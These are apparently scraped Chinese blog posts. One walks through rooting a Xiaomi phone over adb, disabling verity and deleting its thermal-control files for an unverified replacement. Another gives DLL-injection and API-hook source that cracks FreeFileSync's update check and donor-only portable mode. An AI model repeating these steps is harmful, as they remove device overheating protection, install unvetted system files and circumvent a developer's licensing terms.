href="http://zhushou.xiaomi.com/"小米手机助手/a或任何其他安卓手机助手（都自带），或者：/p ol lia href="https://www.360.cn/qudongdashi/"360驱动大师/a/li lia href="http://www.drivergenius.com/"驱动精灵/a/li lia href="https://adb.clockworkmod.com/"Universal Adb Driver/a/li lia href="https://www.mi.com/c/service/download/index.html#modal-download"MIUI 官方的小米手机驱动/a/li li其他hellip;/li /ol p　　a href="https://lcx.cc/"strong核总/strong/astrong推荐/strong使用：a href="https://www.360.cn/qudongdashi/"360驱动大师/a、a href="https://adb.clockworkmod.com/"Universal Adb Driver/a/p p　　工具软件只需要 strongPlatform-Tools/strong 中的 strongadb.exe/strong（安卓官方调试工具），此乃极客、刷机、折腾的strong必备/strong工具！/p p　　em一直以来，刷机爱好者折腾 Android 系统使用的 adb / fastboot 都来自两个渠道：别人提供的（来源不明）、安装十分庞大的 Android Studio，从来没有一个官方的、可靠的独立 adb / fastboot 工具包，现在终于有了！/em/p p　　Google 谷歌官方提供了 Windows、macOS 以及 Linux 下的工具包的直接下载地址：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"https://dl.google.com/android/repository/platform-tools-latest-darwin.zip https://dl.google.com/android/repository/platform-tools-latest-linux.zip https://dl.google.com/android/repository/platform-tools-latest-windows.zip /code/pre/td/tr/table /div /divp　　从此地址下载的 a href="https://developer.android.com/studio/releases/platform-tools"Platform-Tools/a 工具包将永远是最新版本。/p h2 id="操作方案"操作方案/h2 p　　以 MIUI 10 版本为例，其他版本大同小异。/p p　　1、strong删除/strong刚才说的这几个strong温控配置文件/strong（建议strong备份/strong）：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"/system/vendor/bin/thermal-engine /system/vendor/etc/thermal-engine-8996.conf /system/vendor/etc/thermal-engine-8996-game.conf /system/vendor/etc/thermal-engine-8996-high.conf /system/vendor/etc/thermal-engine-8996-map.conf /code/pre/td/tr/table /div /divp　　2、复制 MIUI 论坛大佬strong修改过的温控文件/strong到：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"/system/vendor/etc/thermal-engine-8996.conf /code/pre/td/tr/table /div /divp　　3、最后手动strong重启/strong，完事，strong四核火力全开温度不热/strong。/p p　　此温控配置方案可以解决strong任何顽固温控/strong，火力全开strong不锁核/strong，并且strong发热可控不烧机/strong（strong小米公司一堆工程猪连个发热都解决不好，只会降频、锁核~/strong），并且只要 MIUI 系统没有很大结构性更新，就strong永久有效/strong！/p p　　需要strong注意/strong的是，上边说过小米系统strong更新后/strong所有修改都会strong恢复/strong，所以每次系统更新完还需要strong再修改一次/strong！/p h2 id="操作流程"操作流程/h2 p　　a href="https://lcx.cc/"strong核总/strong/aa href="https://lcx.cc/"(https://lcx.cc/)/a用的方案strong不依赖任何第三方应用/strong，strong简单安全高效/strong！/p p　　以下为全命令操作流程：/p p　　1、首先使用 adb.exe 解锁 system 分区：/p p　　strong注意！仅刷机或系统更新后首次需要解锁！如果已经解锁过则直接第 2 步！/strong/p p　　★ strong警告！system 分区解锁后如果修改了 system 目录的文件，就不能再上锁，否则无法通过开机文件校验！/strong ★/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /spanspan class="lnt"6 /spanspan class="lnt"7 /spanspan class="lnt"8 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# 提升为 root 权限 adb root # 解锁 system 分区（重新启动后生效） adb disable-verity # 重启 adb reboot /code/pre/td/tr/table /div /divp　　2、等待重启开机后，先strong开启 root 权限/strong：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"adb root /code/pre/td/tr/table /div /divp　　3、然后挂载 system 目录为strong读写权限/strong（可以在 adb shell 中查看分区挂载状态：codemount | grep 'system'/code）/p p　　strong提示：如果部分机型无效的话，可以参考底下的：a href="#%E5%87%A0%E7%A7%8D%E6%8C%82%E8%BD%BD%E6%96%B9%E6%B3%95"几种挂载方法/a/strong/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"adb shell mount -o rw,remount -t auto /system /code/pre/td/tr/table /div /divp　　4、然后strong备份/strong或strong直接删除/strong原版strong温控配置/strong文件（反正系统更新后又会回来）：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# 备份 adb shell mv /system/vendor/bin/thermal-engine /system/vendor/bin/thermal-engine.bak adb shell mv /system/vendor/etc/thermal-engine-8996-game.conf /system/vendor/etc/thermal-engine-8996-game.conf.bak adb shell mv /system/vendor/etc/thermal-engine-8996-high.conf /system/vendor/etc/thermal-engine-8996-high.conf.bak adb shell mv /system/vendor/etc/thermal-engine-8996-map.conf /system/vendor/etc/thermal-engine-8996-map.conf.bak adb shell mv /system/vendor/etc/thermal-engine-8996.conf /system/vendor/etc/thermal-engine-8996.conf.bak # 或者直接删除 adb shell rm -f /system/vendor/bin/thermal-engine adb shell rm -f /system/vendor/etc/thermal-engine-8996-game.conf adb shell rm -f /system/vendor/etc/thermal-engine-8996-high.conf adb shell rm -f /system/vendor/etc/thermal-engine-8996-map.conf adb shell rm -f /system/vendor/etc/thermal-engine-8996.conf /code/pre/td/tr/table /div /divp　　5、strong复制修改过的温控文件/strong到系统 system 目录（文章末尾有下载）：/p p　　strong注意！操作 system 目录需要 adb root 权限！（前边已开启）/strong/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"adb push #34;C:\电脑本机路径\thermal-engine-8996.conf#34; /system/vendor/etc/thermal-engine-8996.conf /code/pre/td/tr/table /div /divp　　6、恢复 system 权限为 read only：/p p　　这一步为strong可选操作/strong，因为strong重启后/strong无需操作会strong自动恢复/strong，当然，如果不打算重启机子的话，最好还是将它恢复到 read only 状态。/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"adb shell mount -o ro,remount -t auto /system /code/pre/td/tr/table /div /divp　　7、最后重启手机即可：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"adb reboot /code/pre/td/tr/table /div /divp　　8、strong关闭/strong手机的 strongUSB 调试/strong及strong开发者模式/strong，避免strong安全隐患/strong。（具体见上边）/p p　　至此操作完成！尽情享受strong多核火力全开/strong带来的快感吧！/p h2 id="参考资料"参考资料/h2 p　　以下两个帖子，温控文件只有strong大核心温度频率控制区别/strong，“逆天少之龙”的是：strong1747000/strong，“刚刚不”的是：strong1516000/strong，其它strong完全一样/strong。/p p　　strong核总/stronga href="https://lcx.cc/"(https://lcx.cc/)/a发现其实是“刚刚不”抄袭的“逆天少之龙”配置文件（互相有可能认识的），而且这两位也是strong一知半解/strong，讲得strong十分混乱/strong，新手可能看的strong一脸懵逼/strong……/p ol lia href="http://www.miui.com/thread-17542989-1-1.html"小米82x机型温控完美解决/a，逆天少之龙发表于 2018-8-17 19:17/li lia href="http://www.miui.com/thread-17712899-1-1.html"小米5s改温控文件/a，刚刚不发表于 2018-8-24 18:05/li /ol p　　摘录原帖部分有用内容留存一下：/p blockquote p[教程] 小米82x机型温控完美解决/p pa href="http://www.miui.com/thread-17542989-1-1.html"http://www.miui.com/thread-17542989-1-1.html/a/p p逆天少之龙 2018-8-17 19:17 | 来自小米手机5s |复制| |跳转/p p看到标题，大家觉得可能又是温控拜拜，内核调校等等，不！今天我教大家怎么用re文件管理器完美解决火龙温控与锁核与温度问题！/p p首先需要解锁bl（没有解锁不用看下去了），然后获取完整root权限，记住是完整权限！然后给re文件管理器root权限，接着找到下图文件夹/p p然后，将下面链接文件复制在上面删除三个文件的文件夹里，然后关机重启就行，最后附上链接/p p链接:https://pan.baidu.com/s/1T8r93oV7oBqe6p_eLwL-TQ 密码:81vv（已失效）/p p亲测温度低了许多，永远不锁核，续航提升不少，下面附图/p p效果用事实说话/p p楼主| 2018-9-19 20:59 | 来自小米手机5s |/p p重新分享链接在这里链接:https://pan.baidu.com/s/1R0SfRBcDd5CtCrwSdQDRgw 密码:qr3o/p hr p[教程] 小米5s改温控文件/p pa href="http://www.miui.com/thread-17712899-1-1.html"http://www.miui.com/thread-17712899-1-1.html/a/p p刚刚不 2018-8-24 18:05 | 来自小米手机5s |复制| |跳转/p p首先手机要root ，下载re文件管理器，system解锁工具，下载好给root权限，打开system解锁（手机会重启），/p p打开re浏览器，在左边的根目录找到system文件夹点开，找到etc文件夹点开，找到thermal-engine-8996-high.conf thermal-engine-8996-map.conf thermal-engine-8996.conf这三个文件（都在一起的）把它删除，/p p然后把下载的温控文件复制过去到这个文件夹，然后回到根目录找到vendor点开找到thermal-engine把他删除。/p p然后手动重启，完事，四核全开温度不热。/p p链接:https://pan.baidu.com/s/1qtDSBK4kljjsCKV9H9uUlQ 密码:y1tl 温控文件/p p链接:https://pan.baidu.com/s/1Qsue8v3vKrC8GywMgR8YgA 密码:71vl re浏览器/p p链接:https://pan.baidu.com/s/1S_P4kDyCCq_MLPYV7Akv5g 密码:3ip9 system解锁/p /blockquote h3 id="几种挂载方法"几种挂载方法/h3 p　　使用 mount 挂载 system 目录为读写权限。/p p　　1、获取 system 分区当前全名和权限/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /spanspan class="lnt"6 /spanspan class="lnt"7 /spanspan class="lnt"8 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"mount | grep #39;system#39; # 或者 cat /proc/partitions # 说明 ro = read only（只读） rw = read write（读写） /code/pre/td/tr/table /div /divp　　2、重新挂载 system 为读写权限/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /spanspan class="lnt"6 /spanspan class="lnt"7 /spanspan class="lnt"8 /spanspan class="lnt"9 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# 参数“/dev/block/sde39”为第一步返回结果 # 注意！每个手机不一样！解锁前后也不一样！每次操作前都要查看！！！ mount -o remount,rw /dev/block/sde39 /system # 如果提示：mount: #39;/system#39; not in /proc/mounts，使用底下命令（推荐）： mount -o rw,remount -t auto /system # 或者（linux系统自己会去维护一个已经mount的表.所以只需要输入现有的挂载点就行啦） mount -o remount,rw /system /code/pre/td/tr/table /div /divp　　3、重新查看、验证 system 权限/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"mount | grep #39;system#39; /code/pre/td/tr/table /div /divp　　4、恢复 system 权限为 read only（只读）（或者重启后无需操作会自动恢复，当然，如果不打算重启机子的话，最好还是将它恢复到 read only 状态）/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /spanspan class="lnt"4 /spanspan class="lnt"5 /spanspan class="lnt"6 /spanspan class="lnt"7 /spanspan class="lnt"8 /spanspan class="lnt"9 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# 参数“/dev/block/dm-0”为第一步返回结果 # 注意！每个手机不一样！解锁前后也不一样！每次操作前都要查看！！！ mount -o remount,ro /dev/block/dm-0 /system # 如果提示：mount: #39;/system#39; not in /proc/mounts，使用底下命令（推荐）： mount -o ro,remount -t auto /system # 或者（linux系统自己会去维护一个已经mount的表.所以只需要输入现有的挂载点就行啦） mount -o remount,ro /system /code/pre/td/tr/table /div /divh2 id="相关下载"相关下载/h2 ol lia href="https://lcx.cc/file/4592/thermal-engine-8996.conf"thermal-engine-8996.conf/a (修改好的温控配置文件)/li lia href="https://www.coolapk.com/apk/com.an.killthermal"温控拜拜.apk/a/li lia href="https://pan.baidu.com/s/19KYK5qfttSRCwQkoYrHkmg"system 分区一键解锁、上锁.apk/a/li lia href="http://zhushou.xiaomi.com/"小米手机助手/a/li lia href="https://www.360.cn/qudongdashi/"360驱动大师/a/li lia href="http://www.drivergenius.com/"驱动精灵/a/li lia href="https://adb.clockworkmod.com/"Universal Adb Driver/a/li lia href="https://www.mi.com/c/service/download/index.html#modal-download"MIUI 官方的小米手机驱动/a/li lia href="https://developer.android.com/studio/releases/platform-tools"Platform-Tools/a (adb.exe): a href="https://dl.google.com/android/repository/platform-tools-latest-darwin.zip"Darwin/macOS?/a、a href="https://dl.google.com/android/repository/platform-tools-latest-linux.zip"Linux/a、a href="https://dl.google.com/android/repository/platform-tools-latest-windows.zip"Windows/a/li /ol

FreeFileSync 全版本破解补丁、绿色便携版

Nuclear'Atk（核攻击）网络安全实验室

2019年1月28日 14:49

p　　FreeFileSync (官网: a href="https://freefilesync.org/"https://freefilesync.org//a) 是一款免费、开源的文件夹比较和同步软件，跨平台、多协议、双向文件夹对比同步工具，支持 Google Driver、SFTP(SSH)、FTP 等协议，十分好用，支持 Windows、Linux、Mac OS X，它也适用于64位操作系统。/p p　　程序安装默认可选择一个标准的安装程序或作为一个便携式应用程序。采用一个干净、简单、直观的界面，以同步为目标，提供了多种功能。/p p　　stronga href="https://lcx.cc/"核总/a/stronga href="https://lcx.cc/"(https:/lcx.cc/)/a曾经在“a href="https://lcx.cc/post/4590/"全球几款免费的文件对比同步工具简单测评/a”一文中对该工具做过简单介绍。/p p　　stronga href="https://lcx.cc/"核总/astrong用这个软件也有好几年了，官方虽然说有/strong便携版/strong功能（无需安装、即开即用），但是限定了只有strong捐赠版/strong才有，你懂的，要银子~/p p　　strong注意/strong！这是个strong免费开源软件/strong！为了软件的持续发展，还是希望有钱的大佬strong购买捐赠版/strong！/p blockquote pstrong如果您发现FreeFileSync很有用，请考虑通过捐赠来支持该项目。/strong/p /blockquote blockquote pstrong您的捐款将资助新功能的开发，并有助于保持持续的计划维护。这可确保FreeFileSync保持最新，并始终在不断变化的硬件和软件上提供最佳性能。/strong/p /blockquote blockquote pstrong支持该项目：https://freefilesync.org/donate.php/strong/p /blockquote p　　然而像a href="https://lcx.cc/"strong核总/strong/aa href="https://lcx.cc/"(https:/lcx.cc/)/a这种穷逼怎么可能买得起捐赠版……/p p　　So……/p p　　泽东同志说得好，自己动手、丰衣足食~/p p　　于是strong核总/stronga href="https://lcx.cc/"(https:/lcx.cc/)/a对软件研究了一番，主要想实现以下几个功能：/p ol li绿色便携版功能/li li禁止强制自动更新/li /ol p　　em（只有捐赠版才能选择是否自动更新，普通版无论选什么都是强制更新，很烦人）/em/p h2 id="便携版"便携版/h2 p　　首先便携版功能比较好实现，官方普通版直接随便安装到一个路径，然后把安装好的文件打包就可以了，也就是说官方程序默认支持不安装运行，也没有注册表依赖什么的，无需进行修改。/p h3 id="文件结构"文件结构/h3 div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /spanspan class="lnt"20 /spanspan class="lnt"21 /spanspan class="lnt"22 /spanspan class="lnt"23 /spanspan class="lnt"24 /spanspan class="lnt"25 /spanspan class="lnt"26 /spanspan class="lnt"27 /spanspan class="lnt"28 /spanspan class="lnt"29 /spanspan class="lnt"30 /spanspan class="lnt"31 /spanspan class="lnt"32 /spanspan class="lnt"33 /spanspan class="lnt"34 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"# 以最新的 10.8 版本做例子 # 其他版本大同小异，没写到的文件是无用文件，例如 uninstall.exe 之类的 FreeFileSync v10.8 │ │ ding.wav # 提示音 │ gong.wav # 提示音 │ harp.wav # 提示音 │ Install.dat # 安装记录（仅卸载的时候清理文件用，没啥用） │ Resources.zip # 图标资源文件 │ LastRun.ffs_gui # 最近的同步任务记录（配置文件） │ HideConsole.vbs # 隐藏启动器 │ FreeFileSync.exe # 启动器，根据系统版本启动 Bin 目录中对应的主程序 │ RealTimeSync.exe # 启动器，启动后台实时同步任务进程（同上） │ GlobalSettings.xml # 全局设置（配置文件） │ ├─Bin # 存放真正主程序的文件夹，主程序根据系统类型分为各个版本 │ FreeFileSync_Win32.exe # Windows x86 主程序 │ FreeFileSync_x64.exe # Windows x64 主程序 │ FreeFileSync_XP.exe # Windows XP 主程序 │ RealTimeSync_Win32.exe # Windows x86 实时同步任务进程 │ RealTimeSync_x64.exe # Windows x64 实时同步任务进程 │ RealTimeSync_XP.exe # Windows XP 实时同步任务进程 │ Shadow_Server2003_Win32.dll # 依赖组件（界面效果相关） │ Shadow_Windows7_Win32.dll # 依赖组件（界面效果相关） │ Shadow_Windows7_x64.dll # 依赖组件（界面效果相关） │ Shadow_XP_Win32.dll # 依赖组件（界面效果相关） │ Taskbar7_Win32.dll # 依赖组件（界面效果相关） │ Taskbar7_x64.dll # 依赖组件（界面效果相关） │ ├─GoogleDrive # 谷歌云盘相关目录 ├─Languages # 语言文件（官方提供了几十种语言文件，只保留简体中文就够用了） │ chinese_simple.lng │ └─Logs # 一些执行日志文件，没啥用 /code/pre/td/tr/table /div /divh2 id="禁用自动更新"禁用自动更新/h2 p　　对程序进行了简单的逆向破解分析后，发现主程序使用了自校验保护，直接修改主程序打补丁的话比较麻烦，于是采用了 dll 注入打内存补丁的方案，简单、粗暴、直接、高效！/p h3 id="更新原理"更新原理/h3 p　　官方采用的自动更新方法很简单，直接 http 请求：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /spanspan class="lnt"20 /spanspan class="lnt"21 /spanspan class="lnt"22 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"http://www.freefilesync.org/get_latest_version_number.php POST /get_latest_version_number.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: FFS-Update-Check Host: freefilesync.org Content-Length: 125 Cache-Control: no-cache ffs_version=10.8amp;installation_type=Portableamp;ffs_variant=Freeamp;os_name=Windowsamp;os_version=6.1amp;os_arch=64amp;language=zhamp;country=CN HTTP/1.1 200 OK Date: Mon, 28 Jan 2019 06:17:54 GMT Server: Apache Content-Length: 4 Cache-Control: max-age=3600 Expires: Mon, 28 Jan 2019 07:17:54 GMT Vary: Accept-Encoding,User-Agent Content-Type: application/octet-stream 10.8 /code/pre/td/tr/table /div /divp　　如果有新版本的话，则执行以下请求获取新版本更新说明（以 9.5 版本为例）：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /spanspan class="lnt"20 /spanspan class="lnt"21 /spanspan class="lnt"22 /spanspan class="lnt"23 /spanspan class="lnt"24 /spanspan class="lnt"25 /spanspan class="lnt"26 /spanspan class="lnt"27 /spanspan class="lnt"28 /spanspan class="lnt"29 /spanspan class="lnt"30 /spanspan class="lnt"31 /spanspan class="lnt"32 /spanspan class="lnt"33 /spanspan class="lnt"34 /spanspan class="lnt"35 /spanspan class="lnt"36 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"POST /get_latest_changes.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: FFS-Update-Check Host: www.freefilesync.org Content-Length: 9 Cache-Control: no-cache since=9.4 HTTP/1.1 200 OK Date: Sun, 12 Nov 2017 08:19:47 GMT Server: Apache Cache-Control: max-age=3600 Expires: Sun, 12 Nov 2017 09:19:47 GMT Vary: Accept-Encoding,User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 2c0 FreeFileSync 9.5 [2017-11-05] ----------------------------- Allow to change error handling option on progress dialogs Set up shutdown behavior during sync (summary, exit, sleep) Conditional execution of the post sync command line Directly use native shutdown/sleep API Run post sync command even when fail on first error was set Merged batch and GUI error handling options Write post sync command to log file Update GUI-specific options when saving as batch job Progress graph area matches processed data ratio Delete files permanently with Shift+Del Apply correct quotation for CSV-exported folder list Use Unicode arrow chars with ASCII for variant description Updated libcurl, OpenSSL to latest builds 0 /code/pre/td/tr/table /div /divp　　最后提示用户更新软件（官方更新频率很高，所以神烦）。/p p　　升级请求主要出现在以下文件中：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"\Bin\FreeFileSync_Win32.exe \Bin\FreeFileSync_x64.exe \Bin\FreeFileSync_XP.exe /code/pre/td/tr/table /div /divh3 id="破解方案"破解方案/h3 p　　所以屏蔽自动升级方案就很简单了，直接注入一个 dll 到主程序中，然后直接修改内存 API 函数调用地址，拦截 http 更新请求，也就是内存补丁。/p p　　观察了一下 HTTP 请求调用的函数，发现主要使用以下几个 API：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /spanspan class="lnt"2 /spanspan class="lnt"3 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"InternetOpenW InternetConnectW InternetReadFile /code/pre/td/tr/table /div /divp　　于是使用 PowerBASIC 简单的写了个 dll，核心源码如下：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt" 1 /spanspan class="lnt" 2 /spanspan class="lnt" 3 /spanspan class="lnt" 4 /spanspan class="lnt" 5 /spanspan class="lnt" 6 /spanspan class="lnt" 7 /spanspan class="lnt" 8 /spanspan class="lnt" 9 /spanspan class="lnt"10 /spanspan class="lnt"11 /spanspan class="lnt"12 /spanspan class="lnt"13 /spanspan class="lnt"14 /spanspan class="lnt"15 /spanspan class="lnt"16 /spanspan class="lnt"17 /spanspan class="lnt"18 /spanspan class="lnt"19 /spanspan class="lnt"20 /spanspan class="lnt"21 /spanspan class="lnt"22 /spanspan class="lnt"23 /spanspan class="lnt"24 /spanspan class="lnt"25 /spanspan class="lnt"26 /spanspan class="lnt"27 /spanspan class="lnt"28 /spanspan class="lnt"29 /spanspan class="lnt"30 /spanspan class="lnt"31 /spanspan class="lnt"32 /spanspan class="lnt"33 /spanspan class="lnt"34 /spanspan class="lnt"35 /spanspan class="lnt"36 /spanspan class="lnt"37 /spanspan class="lnt"38 /spanspan class="lnt"39 /spanspan class="lnt"40 /spanspan class="lnt"41 /spanspan class="lnt"42 /spanspan class="lnt"43 /spanspan class="lnt"44 /spanspan class="lnt"45 /spanspan class="lnt"46 /spanspan class="lnt"47 /spanspan class="lnt"48 /spanspan class="lnt"49 /spanspan class="lnt"50 /spanspan class="lnt"51 /spanspan class="lnt"52 /spanspan class="lnt"53 /spanspan class="lnt"54 /spanspan class="lnt"55 /spanspan class="lnt"56 /spanspan class="lnt"57 /spanspan class="lnt"58 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"#compile dll #34;hook.dll#34; #dim all #include #34;Win32API.inc#34; #include #34;HookApi.inc#34; %SE_DEBUG_PRIVILEGE = amp;H14 declare function RtlAdjustPrivilege lib #34;ntdll.dll#34; alias #34;RtlAdjustPrivilege#34;(byval Privilege as long, byval enable as long, byval CurrentThread as long, WasEnabled as long) as long global ghInstance as dword global hThread as dword #39;线程id global nextHook as dword function libmain (byval hInstance as long, byval fwdReason as long, byval lpvReserved as long) as long select case fwdReason case %DLL_PROCESS_ATTACH ghInstance = hInstance RtlAdjustPrivilege(%SE_DEBUG_PRIVILEGE, 1, 0, 0) #39;提升进程权限 thread create LoadHook(0) to hThread #39;创建一个线程加载hook function = 1 #39;success! case %DLL_PROCESS_DETACH #39;---------- local lresult as long thread close hThread to lresult #39;销毁线程 UnHookAPI(nextHook) #39;卸载 hook #39;---------- function = 1 #39;success! case %DLL_THREAD_ATTACH function = 1 #39;success! case %DLL_THREAD_DETACH function = 1 #39;success! end select end function thread function LoadHook(byval n as long) as long #39; HookAPI(#34;USER32.dll#34;, #34;MessageBoxA#34;, codeptr(functionCallback), nextHook) HookAPI(#34;WININET.dll#34;, #34;InternetOpenW#34;, codeptr(Callback_InternetOpenW), nextHook) #39; HookAPI(#34;WININET.dll#34;, #34;InternetConnectW#34;, codeptr(Callback_InternetConnectW), nextHook) #39; HookAPI(#34;WININET.dll#34;, #34;InternetReadFile#34;, codeptr(Callback_InternetReadFile), nextHook) end function function Callback_InternetOpenW(byref lpszAgent as wstringz, byval dwAccessType as dword, byref lpszProxy as wstringz, byref lpszProxyBypass as wstringz, byval dwFlags as dword) as dword #39; msgbox #34;InternetOpenW#34; function = %false end function function Callback_InternetConnectW( _ byval hInternet as dword, byref lpszServerName as wstringz, byval nServerPort as word, _ byref lpszUserName as wstringz, byref lpszPassword as wstringz, _ byval dwService as dword, byval dwFlags as dword, optional byval dwContext as dword) as dword #39; msgbox #34;InternetConnectW#34; function = %false end function function Callback_InternetReadFile(byval hFile as dword, byval lpBuffer as byte ptr, byval dwNumberOfBytesToRead as dword, byref lpdwNumberOfBytesRead as dword) as long #39; msgbox #34;InternetReadFile#34; function = %false end function /code/pre/td/tr/table /div /divh3 id="使用方法"使用方法/h3 p　　然后只需要在主程序启动时注入这个 dll 即可屏蔽所有更新请求。/p p　　虽然主程序有多个版本（见 bin 文件夹），但是 win32 版本是通用的，所以只需要启动着一个即可，使用a href="https://lcx.cc/"核总/a很早以前写的 dll 注射器实现启动注入（可使用批处理实现一键启动）：/p div class="highlight"div class="chroma" table class="lntable"trtd class="lntd" pre class="chroma"codespan class="lnt"1 /span/code/pre/td td class="lntd" pre class="chroma"code class="language-fallback" data-lang="fallback"inject.exe #34;\Bin\FreeFileSync_Win32.exe#34; /code/pre/td/tr/table /div /divp　　至此，完美屏蔽自动更新。/p h2 id="相关说明"相关说明/h2 p　　以上破解思路、代码及程序是a href="https://lcx.cc/"核总/aa href="https://lcx.cc/"(https:/lcx.cc/)/a在 2017 年底记录、开发的，今天没事整理了一下发出来，相关程序见底下下载。/p p　　当时破解的版本是 9.5，但是破解补丁是通用的（只要官方没有很大的结构性更新），也就是说 FreeFileSync 9.x、10.x 及以后全版本通杀。/p h2 id="相关下载"相关下载/h2 p　　a href="https://lcx.cc/file/4591/FreeFileSync%20%E5%85%A8%E7%89%88%E6%9C%AC%E5%B1%8F%E8%94%BD%E8%87%AA%E5%8A%A8%E5%8D%87%E7%BA%A7%E7%A0%B4%E8%A7%A3%E8%A1%A5%E4%B8%81.rar"FreeFileSync全版本屏蔽自动升级破解补丁.rar/a/p

全球几款免费的文件对比同步工具简单测评

Nuclear'Atk（核攻击）网络安全实验室

2019年1月19日 21:54

